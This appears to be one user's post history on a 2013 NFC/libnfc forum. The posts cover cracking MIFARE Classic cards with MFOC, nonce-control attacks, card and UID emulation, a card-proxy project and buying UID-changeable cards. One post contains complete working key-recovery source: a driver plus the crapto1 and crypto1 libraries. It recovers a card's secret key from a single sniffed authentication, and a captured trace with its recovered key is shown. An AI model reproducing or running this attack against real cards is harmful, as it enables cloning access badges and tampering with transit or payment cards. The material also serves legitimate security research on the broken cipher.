UID looks like this:
UID[4]
a611efaaRF technology:
Type A (ISO/IEC 14443 Type A)Tag type:
Mifare Classic 4kATQA:
0002SAK:
18
Well according to this information it should work. What reader and version of libnfc and MFOC are you using?
1 2013-10-21 16:29:27
Re: Mifare Classic 4k, does MFOC really works? (6 replies, posted in NXP MIFARE Classic)
2 2013-10-16 15:12:39
Re: Mifare Classic 4k, does MFOC really works? (6 replies, posted in NXP MIFARE Classic)
Is it a real card? Or is it emulated? Is the UID 7 byte long? Because if it is I don't know if MFOC works or if it does not
3 2013-10-15 09:55:07
Re: [Solved] Beginner in RFiD wants to crack Mifare Cards (24 replies, posted in MFOC, MFCUK, Crapto1, etc.)
Unfortunately neither Mfoc nor SCL3711 works correctly under Windows (on my experience).
So I strongly suggest to use Ubuntu.. Using Ubuntu 13.04 and following the instruction here: https://gist.github.com/lmjabreu/5678039
you should have any problem.
bye
4 2013-10-05 15:00:18
Topic: Controll Nonce Tag using SCL3711 (0 replies, posted in NXP MIFARE Classic)
Hi,
I am trying to implement Nicolas Courtois attack.
For the second stage I need to get always the same nonce. However using an SCL3711, and the hints found here and in proxmark3 forum I am not able to achieve good results. Only few time I get a nonce twice.
At the moment I am using:
NP_ACTIVATE_FIELD, false to disable the RF field
sleep between 100-1100 ms (I did several time with time between these values)
NP_ACTIVATE_FIELD, enable the RF field
Anticollision
Authentication
than back to the top.
I already used a book between NFC reader and tag, to reduce the field but nothing change.
Any idea how to do that?
Thanks 
5 2013-10-04 14:22:15
Re: [Solved] Beginner in RFiD wants to crack Mifare Cards (24 replies, posted in MFOC, MFCUK, Crapto1, etc.)
Hi, using and scl3711 under ubuntu it should work great.
If you wish to recover all other sectors have seach a software called "MFOC",
after installing the libNfc library with this tool and the SCL3711 you should recover
all other data in less than a minute.
bye
6 2013-08-26 15:07:20
Re: Mifare Classic Offline Cracker (64 replies, posted in MFOC, MFCUK, Crapto1, etc.)
Hallo,
Did anybody try MFOC against a Mifare emulated with a mobile phone?
I have to crack a Mifare classic emulated, but after more 100 probes no key come out. I have 10 sectors encrypted with default keys and other with private keys, so I have more then 1 sector to be used as exploit sector.
I am using MFOC 0.10.6 with an SCL3711 and libnfc 1.7.0-rc7.
I captured the traffic between the reader and the mobile phone and the difference between the answer of a card and the phone is that the phone sometime uses APDU to send data. However these data are correctly received at application layer (to MFOC). Any idea of what could be the problem? Timing due to the different type of command received?
Thanks, bye.
7 2013-08-12 14:58:46
Re: Mifare Classic Proxy (2 replies, posted in NXP MIFARE Classic)
Thanks for your replay. Now I am trying to see if with some optimization is possible to do something with my readers. I bought an SCL3711 that looks much more stable in Ubuntu. Using it the UID emulation works perfectly.
Starting from this program I developed a card emulation able to exchange data with a mifare reader.
When I send the TAG Nonce looks like the scl3711 stop working. Here is the output:
R: 52 (7 bits)
T: 04 00
R: 93 20
T: 44 31 bb 58 96 [UID emulated]
R: 93 70 44 31 bb 58 96 8b 2a
T: 08 b6 dd
R: 60 08 bd f7
T: da 6d 79 d0 [card challenge]
error libnfc.driver.pn53x_usb Unable to write to USB (Connection timed out)
error libnfc.driver.pn53x_usb Unable to write to USB (Connection timed out)
error libnfc.driver.pn53x_usb Unable to write to USB (Connection timed out)
^C
Aborting current command...
error libnfc.driver.pn53x_usb Unable to write to USB (Connection timed out)
^C
After that all commands like nfc-list fails and I have to unplug the reader. Sniffing the channel the nonce is sent and the reader answer me and if I stop the program after "da 6d 79 d0" without read the answer or I send an other command all works smoothly (the reader does not crash). Any Idea how to avoid this behaviour?
8 2013-08-08 16:49:42
Re: cheapest uid changeable card? (5 replies, posted in NXP MIFARE Classic)
I just bought from Clonemykey on ebay and the transaction has been perfect. bye
9 2013-08-02 13:19:25
Re: Cardreader ACR 1222U and libnfc (10 replies, posted in Hardware Devices)
Unfortunately I don't know how to solve the situation.
All I can suggest is to try following this commands:
wget libnfc.googlecode.com/files/libnfc-1.7.0-rc4.tar.gz
tar -xvzf libnfc-1.7.0-rc4.tar.gz
rm libnfc-1.7.0-rc4.tar.gz
cd ~
cd libnfc-1.7.0-rc4
./configure --with-drivers=acr122_pcsc && make clean
make clean
make
make install
sudo sh -c "echo /usr/local/lib > /etc/ld.so.conf.d/usr-local-lib.conf"
sudo ldconfig
cdThat is the solution I found here. It worked for me.
10 2013-08-01 19:42:11
Topic: decrypt Message after Authentication using data sniffed (1 replies, posted in NXP MIFARE Classic)
1111 1111 1010 0000 1000 1110 1111 0101 ks4
0111 1101 1101 1110 1010 0110 1011 0011 comando
1000 0010 0111 1110 0010 1000 0100 0110
Hello, sorry I am new of this community. I read some thread about how to retrieve plain text from cipher-text after authentication.
But when I computer k4 to decrypt I get a different message respect what I expect.
R--> T 26
T --> R 04 00
R--> T 93 20
T --> R 2a 69 8d 43 8d
R--> T 93 70 2a 69 8d 43 8d
T --> R 08 b6 dd
R--> T 60 04 d1 3d
T --> R 3b ae 03 2d
R--> T c4 94 a1 d2 6e 96 86 42
T --> R 84 66 05 9e
R--> T 7d de a6 b3
T --> R e7 ee e3 ab 0f 89 bb ed 44 b1 91 ce ef 8a 4d ce
I got:
Keystream used to generate {ar} and {at}:
ks2: 1159b281
ks3: 02fbbe4b
Found Key: [ffffffffffff]
I am trying to decrypt: 7d de a6 b3 that should be: 30 04 cd d1.
I did:
enc = 7d de a6 b3; (message encrypted)
I compute Ks4 as: k4 = enc ^ prng_successor(nt, 128);
ks4: ffa08ef5
And then
7d de a6 b3 XOR ffa08ef5 = 82 7E 28 44
Where I am I wrong?
I hope I did not duplicate an other thread but I did find the answer.
Thank you very much.
I post here a code that I found on proxymark forum that helped me to recover the key. I hope that will be useful also for someone else
//Test2.c
#define __STDC_FORMAT_MACROS
#include <inttypes.h>
#define llx PRIx64
#define lli PRIi64
// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>
int main (int argc, char *argv[]) {
struct Crypto1State *revstate;
uint64_t key; // recovered key
uint32_t uid; // serial number
uint32_t nt; // tag challenge
uint32_t nr_enc; // encrypted reader challenge
uint32_t ar_enc; // encrypted reader response
uint32_t at_enc; // encrypted tag response
uint32_t ks2; // keystream used to encrypt reader response
uint32_t ks3; // keystream used to encrypt tag response
printf("MIFARE Classic key recovery - based 64 bits of keystream\n");
printf("Recover key from only one complete authentication!\n\n");
if (argc < 6) {
printf(" syntax: %s <uid> <nt> <{nr}> <{ar}> <{at}>\n\n",argv[0]);
return 1;
}
sscanf(argv[1],"%x",&uid);
sscanf(argv[2],"%x",&nt);
sscanf(argv[3],"%x",&nr_enc);
sscanf(argv[4],"%x",&ar_enc);
sscanf(argv[5],"%x",&at_enc);
printf("Recovering key for:\n");
printf(" uid: %08x\n",uid);
printf(" nt: %08x\n",nt);
printf(" {nr}: %08x\n",nr_enc);
printf(" {ar}: %08x\n",ar_enc);
printf(" {at}: %08x\n",at_enc);
// Generate lfsr succesors of the tag challenge
printf("\nLFSR succesors of the tag challenge:\n");
printf(" nt': %08x\n",prng_successor(nt, 64));
printf(" nt'': %08x\n",prng_successor(nt, 96));
// Extract the keystream from the messages
printf("\nKeystream used to generate {ar} and {at}:\n");
ks2 = ar_enc ^ prng_successor(nt, 64);
ks3 = at_enc ^ prng_successor(nt, 96);
printf(" ks2: %08x\n",ks2);
printf(" ks3: %08x\n",ks3);
revstate = lfsr_recovery64(ks2, ks3);
lfsr_rollback_word(revstate, 0, 0);
lfsr_rollback_word(revstate, 0, 0);
lfsr_rollback_word(revstate, nr_enc, 1);
lfsr_rollback_word(revstate, uid ^ nt, 0);
crypto1_get_lfsr(revstate, &key);
printf("\nFound Key5: [%012"llx"]\n\n",key);
crypto1_destroy(revstate);
return 0;
}crapto1.c:
//crapto1.c
/* crapto1.c
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1301, US$
Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#include "crapto1.h"
#include <stdlib.h>
#if !defined LOWMEM && defined __GNUC__
static uint8_t filterlut[1 << 20];
static void __attribute__((constructor)) fill_lut()
{
uint32_t i;
for(i = 0; i < 1 << 20; ++i)
filterlut[i] = filter(i);
}
#define filter(x) (filterlut[(x) & 0xfffff])
#endif
static void quicksort(uint32_t* const start, uint32_t* const stop)
{
uint32_t *it = start + 1, *rit = stop;
if(it > rit)
return;
while(it < rit)
if(*it <= *start)
++it;
else if(*rit > *start)
--rit;
else
*it ^= (*it ^= *rit, *rit ^= *it);
if(*rit >= *start)
--rit;
if(rit != start)
*rit ^= (*rit ^= *start, *start ^= *rit);
quicksort(start, rit - 1);
quicksort(rit + 1, stop);
}
/** binsearch
* Binary search for the first occurence of *stop's MSB in sorted [start,stop]
*/
static inline uint32_t* binsearch(uint32_t *start, uint32_t *stop)
{
uint32_t mid, val = *stop & 0xff000000;
while(start != stop)
if(start[mid = (stop - start) >> 1] > val)
stop = &start[mid];
else
start += mid + 1;
return start;
}
/** update_contribution
* helper, calculates the partial linear feedback contributions and puts in MSB
*/
static inline void
update_contribution(uint32_t *item, const uint32_t mask1, const uint32_t mask2)
{
uint32_t p = *item >> 25;
p = p << 1 | parity(*item & mask1);
p = p << 1 | parity(*item & mask2);
*item = p << 24 | (*item & 0xffffff);
}
/** extend_table
* using a bit of the keystream extend the table of possible lfsr states
*/
static inline void
extend_table(uint32_t *tbl, uint32_t **end, int bit, int m1, int m2, uint32_t in)
{
in <<= 24;
for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
if(filter(*tbl) ^ filter(*tbl | 1)) {
*tbl |= filter(*tbl) ^ bit;
update_contribution(tbl, m1, m2);
*tbl ^= in;
} else if(filter(*tbl) == bit) {
*++*end = tbl[1];
tbl[1] = tbl[0] | 1;
update_contribution(tbl, m1, m2);
*tbl++ ^= in;
update_contribution(tbl, m1, m2);
*tbl ^= in;
} else
*tbl-- = *(*end)--;
}
/** extend_table_simple
* using a bit of the keystream extend the table of possible lfsr states
*/
static inline void extend_table_simple(uint32_t *tbl, uint32_t **end, int bit)
{
for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
if(filter(*tbl) ^ filter(*tbl | 1))
*tbl |= filter(*tbl) ^ bit;
else if(filter(*tbl) == bit) {
*++*end = *++tbl;
*tbl = tbl[-1] | 1;
} else
*tbl-- = *(*end)--;
}
/** recover
* recursively narrow down the search space, 4 bits of keystream at a time
*/
static struct Crypto1State*
recover(uint32_t *o_head, uint32_t *o_tail, uint32_t oks,
uint32_t *e_head, uint32_t *e_tail, uint32_t eks, int rem,
struct Crypto1State *sl, uint32_t in)
{
uint32_t *o, *e, i;
if(rem == -1) {
for(e = e_head; e <= e_tail; ++e) {
*e = *e << 1 ^ parity(*e & LF_POLY_EVEN) ^ !!(in & 4);
for(o = o_head; o <= o_tail; ++o, ++sl) {
sl->even = *o;
sl->odd = *e ^ parity(*o & LF_POLY_ODD);
sl[1].odd = sl[1].even = 0;
}
}
return sl;
}
for(i = 0; i < 4 && rem--; i++) {
oks >>= 1;
eks >>= 1;
in >>= 2;
extend_table(o_head, &o_tail, oks & 1, LF_POLY_EVEN << 1 | 1,
LF_POLY_ODD << 1, 0);
if(o_head > o_tail)
return sl;
extend_table(e_head, &e_tail, eks & 1, LF_POLY_ODD,
LF_POLY_EVEN << 1 | 1, in & 3);
if(e_head > e_tail)
return sl;
}
quicksort(o_head, o_tail);
quicksort(e_head, e_tail);
while(o_tail >= o_head && e_tail >= e_head)
if(((*o_tail ^ *e_tail) >> 24) == 0) {
o_tail = binsearch(o_head, o = o_tail);
e_tail = binsearch(e_head, e = e_tail);
sl = recover(o_tail--, o, oks,
e_tail--, e, eks, rem, sl, in);
}
else if(*o_tail > *e_tail)
o_tail = binsearch(o_head, o_tail) - 1;
else
e_tail = binsearch(e_head, e_tail) - 1;
return sl;
}
/** lfsr_recovery
* recover the state of the lfsr given 32 bits of the keystream
* additionally you can use the in parameter to specify the value
* that was fed into the lfsr at the time the keystream was generated
*/
struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in)
{
struct Crypto1State *statelist;
uint32_t *odd_head = 0, *odd_tail = 0, oks = 0;
uint32_t *even_head = 0, *even_tail = 0, eks = 0;
int i;
for(i = 31; i >= 0; i -= 2)
oks = oks << 1 | BEBIT(ks2, i);
for(i = 30; i >= 0; i -= 2)
eks = eks << 1 | BEBIT(ks2, i);
odd_head = odd_tail = malloc(sizeof(uint32_t) << 21);
even_head = even_tail = malloc(sizeof(uint32_t) << 21);
statelist = malloc(sizeof(struct Crypto1State) << 18);
if(!odd_tail-- || !even_tail-- || !statelist) {
free(statelist);
statelist = 0;
goto out;
}
statelist->odd = statelist->even = 0;
for(i = 1 << 20; i >= 0; --i) {
if(filter(i) == (oks & 1))
*++odd_tail = i;
if(filter(i) == (eks & 1))
*++even_tail = i;
}
for(i = 0; i < 4; i++) {
extend_table_simple(odd_head, &odd_tail, (oks >>= 1) & 1);
extend_table_simple(even_head, &even_tail, (eks >>= 1) & 1);
}
in = (in >> 16 & 0xff) | (in << 16) | (in & 0xff00);
recover(odd_head, odd_tail, oks,
even_head, even_tail, eks, 11, statelist, in << 1);
out:
free(odd_head);
free(even_head);
return statelist;
}
static const uint32_t S1[] = { 0x62141, 0x310A0, 0x18850, 0x0C428, 0x06214,
0x0310A, 0x85E30, 0xC69AD, 0x634D6, 0xB5CDE, 0xDE8DA, 0x6F46D, 0xB3C83,
0x59E41, 0xA8995, 0xD027F, 0x6813F, 0x3409F, 0x9E6FA};
static const uint32_t S2[] = { 0x3A557B00, 0x5D2ABD80, 0x2E955EC0, 0x174AAF60,
0x0BA557B0, 0x05D2ABD8, 0x0449DE68, 0x048464B0, 0x42423258, 0x278192A8,
0x156042D0, 0x0AB02168, 0x43F89B30, 0x61FC4D98, 0x765EAD48, 0x7D8FDD20,
0x7EC7EE90, 0x7F63F748, 0x79117020};
static const uint32_t T1[] = {
0x4F37D, 0x279BE, 0x97A6A, 0x4BD35, 0x25E9A, 0x12F4D, 0x097A6, 0x80D66,
0xC4006, 0x62003, 0xB56B4, 0x5AB5A, 0xA9318, 0xD0F39, 0x6879C, 0xB057B,
0x582BD, 0x2C15E, 0x160AF, 0x8F6E2, 0xC3DC4, 0xE5857, 0x72C2B, 0x39615,
0x98DBF, 0xC806A, 0xE0680, 0x70340, 0x381A0, 0x98665, 0x4C332, 0xA272C};
static const uint32_t T2[] = { 0x3C88B810, 0x5E445C08, 0x2982A580, 0x14C152C0,
0x4A60A960, 0x253054B0, 0x52982A58, 0x2FEC9EA8, 0x1156C4D0, 0x08AB6268,
0x42F53AB0, 0x217A9D58, 0x161DC528, 0x0DAE6910, 0x46D73488, 0x25CB11C0,
0x52E588E0, 0x6972C470, 0x34B96238, 0x5CFC3A98, 0x28DE96C8, 0x12CFC0E0,
0x4967E070, 0x64B3F038, 0x74F97398, 0x7CDC3248, 0x38CE92A0, 0x1C674950,
0x0E33A4A8, 0x01B959D0, 0x40DCACE8, 0x26CEDDF0};
static const uint32_t C1[] = { 0x846B5, 0x4235A, 0x211AD};
static const uint32_t C2[] = { 0x1A822E0, 0x21A822E0, 0x21A822E0};
/** Reverse 64 bits of keystream into possible cipher states
* Variation mentioned in the paper. Somewhat optimized version
*/
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3)
{
struct Crypto1State *statelist, *sl;
uint8_t oks[32], eks[32], hi[32];
uint32_t low = 0, win = 0;
uint32_t *tail, table[1 << 16];
int i, j;
sl = statelist = malloc(sizeof(struct Crypto1State) << 4);
if(!sl)
return 0;
sl->odd = sl->even = 0;
for(i = 30; i >= 0; i -= 2) {
oks[i >> 1] = BEBIT(ks2, i);
oks[16 + (i >> 1)] = BEBIT(ks3, i);
}
for(i = 31; i >= 0; i -= 2) {
eks[i >> 1] = BEBIT(ks2, i);
eks[16 + (i >> 1)] = BEBIT(ks3, i);
}
for(i = 0xfffff; i >= 0; --i) {
if (filter(i) != oks[0])
continue;
*(tail = table) = i;
for(j = 1; tail >= table && j < 29; ++j)
extend_table_simple(table, &tail, oks[j]);
if(tail < table)
continue;
for(j = 0; j < 19; ++j)
low = low << 1 | parity(i & S1[j]);
for(j = 0; j < 32; ++j)
hi[j] = parity(i & T1[j]);
for(; tail >= table; --tail) {
for(j = 0; j < 3; ++j) {
*tail = *tail << 1;
*tail |= parity((i & C1[j]) ^ (*tail & C2[j]));
if(filter(*tail) != oks[29 + j])
goto continue2;
}
for(j = 0; j < 19; ++j)
win = win << 1 | parity(*tail & S2[j]);
win ^= low;
for(j = 0; j < 32; ++j) {
win = win << 1 ^ hi[j] ^ parity(*tail & T2[j]);
if(filter(win) != eks[j])
goto continue2;
}
*tail = *tail << 1 | parity(LF_POLY_EVEN & *tail);
sl->odd = *tail ^ parity(LF_POLY_ODD & win);
sl->even = win;
++sl;
sl->odd = sl->even = 0;
continue2:;
}
}
return statelist;
}
/** lfsr_rollback_bit
* Rollback the shift register in order to get previous states
*/
uint8_t lfsr_rollback_bit(struct Crypto1State *s, uint32_t in, int fb)
{
int out;
uint8_t ret;
s->odd &= 0xffffff;
s->odd ^= (s->odd ^= s->even, s->even ^= s->odd);
out = s->even & 1;
out ^= LF_POLY_EVEN & (s->even >>= 1);
out ^= LF_POLY_ODD & s->odd;
out ^= !!in;
out ^= (ret = filter(s->odd)) & !!fb;
s->even |= parity(out) << 23;
return ret;
}
/** lfsr_rollback_byte
* Rollback the shift register in order to get previous states
*/
uint8_t lfsr_rollback_byte(struct Crypto1State *s, uint32_t in, int fb)
{
int i, ret = 0;
for (i = 7; i >= 0; --i)
ret |= lfsr_rollback_bit(s, BIT(in, i), fb) << i;
return ret;
}
/** lfsr_rollback_word
* Rollback the shift register in order to get previous states
*/
uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb)
{
int i;
uint32_t ret = 0;
for (i = 31; i >= 0; --i)
ret |= lfsr_rollback_bit(s, BEBIT(in, i), fb) << (i ^ 24);
return ret;
}
/** nonce_distance
* x,y valid tag nonces, then prng_successor(x, nonce_distance(x, y)) = y
*/
static uint16_t *dist = 0;
int nonce_distance(uint32_t from, uint32_t to)
{
uint16_t x, i;
if(!dist) {
dist = malloc(2 << 16);
if(!dist)
return -1;
for (x = i = 1; i; ++i) {
dist[(x & 0xff) << 8 | x >> 8] = i;
x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15;
}
}
return (65535 + dist[to >> 16] - dist[from >> 16]) % 65535;
}
static uint32_t fastfwd[2][8] = {
{ 0, 0x4BC53, 0xECB1, 0x450E2, 0x25E29, 0x6E27A, 0x2B298, 0x60ECB},
{ 0, 0x1D962, 0x4BC53, 0x56531, 0xECB1, 0x135D3, 0x450E2, 0x58980}};
/** lfsr_prefix_ks
*
* Is an exported helper function from the common prefix attack
* Described in the "dark side" paper. It returns an -1 terminated array
* of possible partial(21 bit) secret state.
* The required keystream(ks) needs to contain the keystream that was used to
* encrypt the NACK which is observed when varying only the 3 last bits of Nr
* only correct iff [NR_3] ^ NR_3 does not depend on Nr_3
*/
uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd)
{
uint32_t c, entry, *candidates = malloc(4 << 10);
int i, size = 0, good;
if(!candidates)
return 0;
for(i = 0; i < 1 << 21; ++i) {
for(c = 0, good = 1; good && c < 8; ++c) {
entry = i ^ fastfwd[isodd][c];
good &= (BIT(ks[c], isodd) == filter(entry >> 1));
good &= (BIT(ks[c], isodd + 2) == filter(entry));
}
if(good)
candidates[size++] = i;
}
candidates[size] = -1;
return candidates;
}
/** check_pfx_parity
* helper function which eliminates possible secret states using parity bits
*/
static struct Crypto1State*
check_pfx_parity(uint32_t prefix, uint32_t rresp, uint8_t parities[8][8],
uint32_t odd, uint32_t even, struct Crypto1State* sl)
{
uint32_t ks1, nr, ks2, rr, ks3, c, good = 1;
for(c = 0; good && c < 8; ++c) {
sl->odd = odd ^ fastfwd[1][c];
sl->even = even ^ fastfwd[0][c];
lfsr_rollback_bit(sl, 0, 0);
lfsr_rollback_bit(sl, 0, 0);
ks3 = lfsr_rollback_bit(sl, 0, 0);
ks2 = lfsr_rollback_word(sl, 0, 0);
ks1 = lfsr_rollback_word(sl, prefix | c << 5, 1);
nr = ks1 ^ (prefix | c << 5);
rr = ks2 ^ rresp;
good &= parity(nr & 0x000000ff) ^ parities[c][3] ^ BIT(ks2, 24);
good &= parity(rr & 0xff000000) ^ parities[c][4] ^ BIT(ks2, 16);
good &= parity(rr & 0x00ff0000) ^ parities[c][5] ^ BIT(ks2, 8);
good &= parity(rr & 0x0000ff00) ^ parities[c][6] ^ BIT(ks2, 0);
good &= parity(rr & 0x000000ff) ^ parities[c][7] ^ ks3;
}
return sl + good;
}
/** lfsr_common_prefix
* Implentation of the common prefix attack.
*/
struct Crypto1State*
lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8])
{
struct Crypto1State *statelist, *s;
uint32_t *odd, *even, *o, *e, top;
odd = lfsr_prefix_ks(ks, 1);
even = lfsr_prefix_ks(ks, 0);
s = statelist = malloc((sizeof *statelist) << 20);
if(!s || !odd || !even) {
free(statelist);
statelist = 0;
goto out;
}
for(o = odd; *o + 1; ++o)
for(e = even; *e + 1; ++e)
for(top = 0; top < 64; ++top) {
*o += 1 << 21;
*e += (!(top & 7) + 1) << 21;
s = check_pfx_parity(pfx, rr, par, *o, *e, s);
}
s->odd = s->even = 0;
out:
free(odd);
free(even);
return statelist;
}Crapto1.h:
//crapto1.h
/* crapto1.h
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, US$
Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#ifndef CRAPTO1_INCLUDED
#define CRAPTO1_INCLUDED
#include <stdint.h>
#ifdef __cplusplus
extern "C" {
#endif
struct Crypto1State {uint32_t odd, even;};
struct Crypto1State* crypto1_create(uint64_t);
void crypto1_destroy(struct Crypto1State*);
void crypto1_get_lfsr(struct Crypto1State*, uint64_t*);
uint8_t crypto1_bit(struct Crypto1State*, uint8_t, int);
uint8_t crypto1_byte(struct Crypto1State*, uint8_t, int);
uint32_t crypto1_word(struct Crypto1State*, uint32_t, int);
uint32_t prng_successor(uint32_t x, uint32_t n);
struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in);
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3);
uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd);
struct Crypto1State*
lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8]);
uint8_t lfsr_rollback_bit(struct Crypto1State* s, uint32_t in, int fb);
uint8_t lfsr_rollback_byte(struct Crypto1State* s, uint32_t in, int fb);
uint32_t lfsr_rollback_word(struct Crypto1State* s, uint32_t in, int fb);
int nonce_distance(uint32_t from, uint32_t to);
#define FOREACH_VALID_NONCE(N, FILTER, FSIZE)\
uint32_t __n = 0,__M = 0, N = 0;\
int __i;\
for(; __n < 1 << 16; N = prng_successor(__M = ++__n, 16))\
for(__i = FSIZE - 1; __i >= 0; __i--)\
if(BIT(FILTER, __i) ^ parity(__M & 0xFF01))\
break;\
else if(__i)\
__M = prng_successor(__M, (__i == 7) ? 48 : 8);\
else
#define LF_POLY_ODD (0x29CE5C)
#define LF_POLY_EVEN (0x870804)
#define BIT(x, n) ((x) >> (n) & 1)
#define BEBIT(x, n) BIT(x, (n) ^ 24)
static inline int parity(uint32_t x)
{
#if !defined __i386__ || !defined __GNUC__
x ^= x >> 16;
x ^= x >> 8;
x ^= x >> 4;
return BIT(0x6996, x & 0xf);
#else
asm( "movl %1, %%eax\n"
"mov %%ax, %%cx\n"
"shrl $0x10, %%eax\n"
"xor %%ax, %%cx\n"
"xor %%ch, %%cl\n"
"setpo %%al\n"
"movzx %%al, %0\n": "=r"(x) : "r"(x): "eax","ecx");
return x;
#endif
}
static inline int filter(uint32_t const x)
{
uint32_t f;
f = 0xf22c0 >> (x & 0xf) & 16;
f |= 0x6c9c0 >> (x >> 4 & 0xf) & 8;
f |= 0x3c8b0 >> (x >> 8 & 0xf) & 4;
f |= 0x1e458 >> (x >> 12 & 0xf) & 2;
f |= 0x0d938 >> (x >> 16 & 0xf) & 1;
return BIT(0xEC57E80A, f);
}
#ifdef __cplusplus
}
#endif
#endifcrypto1.c
/* crypto1.c
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, US
Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#include "crapto1.h"
#include <stdlib.h>
#define SWAPENDIAN(x)\
(x = (x >> 8 & 0xff00ff) | (x & 0xff00ff) << 8, x = x >> 16 | x << 16)
struct Crypto1State * crypto1_create(uint64_t key)
{
struct Crypto1State *s = malloc(sizeof(*s));
int i;
for(i = 47;s && i > 0; i -= 2) {
s->odd = s->odd << 1 | BIT(key, (i - 1) ^ 7);
s->even = s->even << 1 | BIT(key, i ^ 7);
}
return s;
}
void crypto1_destroy(struct Crypto1State *state)
{
free(state);
}
void crypto1_get_lfsr(struct Crypto1State *state, uint64_t *lfsr)
{
int i;
for(*lfsr = 0, i = 23; i >= 0; --i) {
*lfsr = *lfsr << 1 | BIT(state->odd, i ^ 3);
*lfsr = *lfsr << 1 | BIT(state->even, i ^ 3);
}
}
uint8_t crypto1_bit(struct Crypto1State *s, uint8_t in, int is_encrypted)
{
uint32_t feedin;
uint8_t ret = filter(s->odd);
feedin = ret & !!is_encrypted;
feedin ^= !!in;
feedin ^= LF_POLY_ODD & s->odd;
feedin ^= LF_POLY_EVEN & s->even;
s->even = s->even << 1 | parity(feedin);
s->odd ^= (s->odd ^= s->even, s->even ^= s->odd);
return ret;
}
uint8_t crypto1_byte(struct Crypto1State *s, uint8_t in, int is_encrypted)
{
uint8_t i, ret = 0;
for (i = 0; i < 8; ++i)
ret |= crypto1_bit(s, BIT(in, i), is_encrypted) << i;
return ret;
}
uint32_t crypto1_word(struct Crypto1State *s, uint32_t in, int is_encrypted)
{
uint32_t i, ret = 0;
for (i = 0; i < 32; ++i)
ret |= crypto1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24);
return ret;
}
/* prng_successor
* helper used to obscure the keystream during authentication
*/
uint32_t prng_successor(uint32_t x, uint32_t n)
{
SWAPENDIAN(x);
while(n--)
x = x >> 1 | (x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31;
return SWAPENDIAN(x);
}Solved I was working with a wrong capture. bye
11 2013-07-30 19:25:18
Re: Cardreader ACR 1222U and libnfc (10 replies, posted in Hardware Devices)
Hi, I don't know if can work for you. But try to re install libnfc with the PCSC driver. Because you are using the USB driver, but the does not work really well.
To install the PCSC driver I think you should use:
./configure --with-drivers=acr122_pcsc
12 2013-07-30 14:26:02
Topic: nfc-mfclassic (0 replies, posted in NXP MIFARE Classic)
Hallo, I am using this tool to recover the information of a mifare classic.
Having all key A I can retrive all the information and dump them to an mfd file.
But there are not Key B inside of the mfd file. Even if using "Tag Info" application with the same Key
I can revocover all the data Included Key B of all secotor. How can I do the same thing with nfc-mfclassic tool?
Here is An example of sector:
00000004- 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
00000005- 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
00000006- 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
00000007- FF FF FF FF FF FF FF 07 80 69 00 00 00 00 00 00 [.........i......]
Where both key are FF FF FF FF FF FF FF but Here Key B is not present.
Thanks, bye
13 2013-07-29 17:02:38
Topic: OpenPCD2 (0 replies, posted in Hardware Devices)
Hello, did anybody boy the OpenPCD2 reader?
Looking the website of the project it looks very promising, but I wish some feedback before buying it.
Someone tried it with libnfc without the LiveCD? Does it work correctly?
Thanks, bye.
14 2013-07-29 14:12:09
Re: Troubles compiling MFOC (and other nfc tools) on Slackware 14 x32 (11 replies, posted in Questions and Requests)
ello, I wish to use mfoc version 0.10.3 but It is no more present in "nfc-tools.googlecode.com/svn/trunk/ " can anybody upload it please? I need that version because I need to use MFOC with libnfc 1.6.0-rc1.
Thanks
15 2013-07-17 11:39:02
Topic: Mifare Classic Proxy (2 replies, posted in NXP MIFARE Classic)
Hello, I wish to write e Mifare Classic Proxy. Unfortunately I have only an ACR122U at the moment.
Using the anticollision example I made the part that pretend to be a reader against the card.
Now I have to write the part predend to be a card.
I read that send a 5 byte UID is impossible using this reader due to the hard coded 0x08 of the first Byte. Is there any reader that can solve this problem?
Does anybody tried something like this?
Because reading the forum I understood that after the problem of 4byte UID this reader as also timing problem. So as far as I get my program won't work due to timeout will be triggered due to slow path to reach the reader. Am I right?
